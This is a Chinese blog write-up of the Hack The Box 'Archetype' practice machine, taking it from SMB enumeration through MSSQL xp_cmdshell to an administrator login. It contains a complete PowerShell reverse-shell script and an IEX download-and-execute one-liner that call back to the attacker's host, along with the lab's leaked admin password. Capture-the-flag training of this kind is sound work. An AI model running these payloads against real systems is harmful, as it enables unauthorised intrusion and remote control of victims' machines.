[渗透测试]HTB-Archetype

最新推荐文章于 2024-09-14 20:04:15 发布
最新推荐文章于 2024-09-14 20:04:15 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47224111/article/details/121288444
版权

0x01 信息收集

在这里插入图片描述

使用nmap扫描 目标
nmap -Pn -sC 10.129.61.193 //-sC 使用脚本扫描 -Pn 跳过主机发现,直接扫描端口

在这里插入图片描述

0x02 对445端口进行测试

Smbclient 是linux上用于连接smb服务的工具
smbclient -L // -L 列出所有共享用户
在这里插入图片描述
存在 backups 匿名登录
smbclient -N //10.129.61.193/backups/ 登录成功
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现数据库账号密码

0x03 对1433端口进行测试

在这里插入图片描述
在这里插入图片描述
select is_srvrolemember(‘sysadmin’)
返回了 1 说明是sa权限 可以使用拓展存储命令执行

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1 reconfigure;
xp_cmdshell "whoami"

这里需要获取一个操作系统shell更加方便我们操作

有很多种办法
powercat
创建一个文件 名字为 shell.ps1 将脚本写入目标机器并执行

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.25",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String ); //2>&1标准错误重定向到标准输出
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

将脚本下载并执行

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.166/shell.ps1\");"

在这里插入图片描述

终于弹回来了 太卡了

在这里插入图片描述
在这里插入图片描述
查看powershell 日志

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\Console Host_history.txt

在这里插入图片描述
此net use命令作用是使用administrator用户登录后将共享文件夹\Archetype\backups映射到本机的T盘

获得了管理员账号密码
使用psexec 连接
在这里插入图片描述
MEGACORP_4dm1n!!

在administrator的桌面的root.txt里发现flag

0x04 impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
#OR:
sudo python3 setup.py install
#In case you are missing some modules:
pip3 install -r requirements.txt

0x05 总结

通过nmap扫描发现存在 445,1433开放。smbclient 列出目标smb共享用户发现可以匿名访问,发现数据库账号密码 通过impacket 里的mssqlclient 连接上
发现是sa权限 获得命令执行 通过python3 搭建简易web服务器
让目标下载powershell脚本并执行 在目标桌面发现第一个flag 查看powershell历史记录。直接看见管理员账户密码,再用impacket里的psexec连接。

select is_srvrolemember('sysadmin') # mssql 查询是否为sa权限(super admin)

powershell 远程下载并通过iex执行脚本

powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.166/shell.ps1\");

powercat

powershell历史地址

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\Console Host_history.txt

net use

psexec

hedianshui888
关注
专栏目录
HTB靶机之Oopsie
m0_46412682的博客
09-01 1559
HTB靶机之Oopsie 1、VPN connection 2、信息收集 ①masscan端口扫描 sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28 ②nmap扫描端口对应的服务 nmap -sC -sV 10.10.10.28 开放了22端口和80端口 操作系统是:linux 3、访问80端口 没有什么可以点或者打开的地方,拉到最下面,有一条提示信息Please login to get access to the s
[渗透测试]HTB-Oopsie
weixin_47224111的博客
11-15 1292
0x01 信息收集 nmap扫描 发现80端口 和22端口
[渗透测试]HTB靶机-Archetype
Y4tacker的博客
07-17 1209
文章目录工具介绍smbclientpsexecArchetype 工具介绍 smbclient Smbclient(samba client)是基于SMB协议的,用于存取共享目标的客户端程序。 参数: 网络资源 网络资源的格式为//服务器名称/资源分享名称。 密码 输入存取网络资源所需的密码。 -B 传送广播数据包时所用的IP地址。 -d< 排错层级> 指定记录文件所记载事件的详细程度。 -E 将信息送到标准错误输出设备。 -h 显示帮助。 -i< 范围> 设置NetBIOS名称范围
HTB Hack The Box -- Archetype
Gh0st_1n_The_Shell的博客
09-06 312
要是不知道怎么连接htb的靶机可以查看我的文章 如何连接Hack The Box的靶机?博客园 如何连接Hack The Box的靶机?CSDN 信息收集 先用nmap扫描对方开放了什么服务 攻击 首先比较引人注意的是 445smb服务,1433SQLServer服务 看到445服务就想到永恒之蓝漏洞,然而在这里应该是windows server的版本比较高(2019),所以应该是已经打了永恒之蓝的补丁 我们可以登陆一下smb服务,看看是否需要密码登录,没有经过权限配置可能默认允许所有人无需身份认证来匿名
HTB_Start Point_Tier2——Archetype
m0_46607055的博客
08-21 1613
htb靶场Archetype 从smb空口令到提权
HTB_Archetype靶机之sqlserver提权
网络安全学习
07-16 1655
第一次接触sqlserver数据库提权
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
htb-beep
m0_55772907的博客
09-15 952
一般
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
0x01-StartingPoint-Archetype
0pr
04-15 1273
HTB-Archetype Article in company with a video makes a perfect learning experience. Today, I am deliverying this write up of the first ever machine that I am going to hack. I am what people call noob! ...
HTB系列】靶机Bitlab的渗透测试
大方子
01-23 2919
https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note
PowerShell常用命令及使用方法
热门推荐
Captain_RB的博客
06-17 5万+
PowerShell 依托.NET Framework平台可以实现非常强大的功能,而且普适性强,Win7及以上系统自带,隐蔽性好,可以直接在内存中运行,能够绕过部分杀软,现将平日操作及内网渗透过程中常用命令及使用方法总结如下。...
我的powershell免杀之路
weixin_43939009的博客
07-11 1190
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 / 这次我将结合前人的各种骚操作,以及个人的不断试错,所想所思,来写一篇关于powershell来进行免杀,达到CS多种姿势绕过AV
远控免杀从入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1110
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
渗透之——PowerShell基本命令和绕过权限执行
冰河的专栏
01-07 5844
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86029412 一、基本命令 以文件操作为例 1.新建目录 New-Item whitecellclub-ItemType Directory 2.新建文件 New-Item light.txt-ItemType File 3.删除目录 Remove-Item...
时间&安全精细化管理平台存在未授权访问漏洞
最新发布
2301_77012231的博客
09-14 189
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 626
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 830
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
HTB攻防记:Stocker,子域探索与XSS利用
该环境主要涉及web安全Linux系统、JavaScript(JS)以及网络安全渗透测试技能的实践。首先,通过使用Nmap工具进行网络探测,攻击者定位了目标IP地址10.129.51.243,并将其添加到hosts文件中以便更方便地访问。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值